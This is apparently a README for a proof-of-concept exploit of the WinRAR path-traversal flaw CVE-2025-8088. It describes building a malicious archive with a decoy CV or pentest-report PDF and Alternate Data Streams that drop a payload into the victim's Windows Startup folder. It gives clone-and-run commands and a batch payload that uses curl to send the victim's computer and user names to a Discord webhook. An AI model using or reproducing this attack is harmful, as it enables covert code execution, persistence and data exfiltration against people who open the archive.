Share
## https://sploitus.com/exploit?id=BDDB51A2-4860-5E0E-B73E-FE014DE6F032
# CVE-2025-8088 WinRAR Exploit ๐Ÿ”“

A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates a malicious RAR archive that embeds payloads in Alternate Data Streams (ADS) with path traversal, potentially leading to arbitrary code execution.

- The issue with a lot of the others is they do not embedd multiple ADS streams requiring either luck you have the right path traversal or know the exact username/extraction directory. 


  


## ๐Ÿš€ How It Works

1. Creates a Decoy Document ๐Ÿ“„ - Generates professional-looking PDF (CV or pentest report)
2. Embeds Multiple ADS Streams ๐Ÿ”„ - Attaches payload streams with different path traversal depths
3. Manipulates RAR Headers โš™๏ธ - Modifies archive structure to exploit path traversal vulnerability
4. Drops Payload to Startup ๐Ÿ“‚ - Attempts to write payload to Windows startup folder when extracted

## ๐Ÿ› ๏ธ Usage
```bash
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088-Exploit.py
```
## โœ๏ธ Payload Customization
Edit the payload to call a Discord webhook:

```bash
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
```

Replace YOUR_DISCORD_WEBHOOK_URL with your actual webhook URL.

## ๐Ÿ”„ Execution Flow
1. Victim extracts the RAR with vulnerable WinRAR (โ‰ค7.12)
2. Payload gets written to startup folder:
   ```bash
   AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
   ```
3. On next reboot โžก๏ธ payload executes automatically

## ๐Ÿ“‹ Requirements
- Windows OS ๐ŸชŸ
- Python 3.x ๐Ÿ
- WinRAR installed
- ReportLab library (pip install reportlab)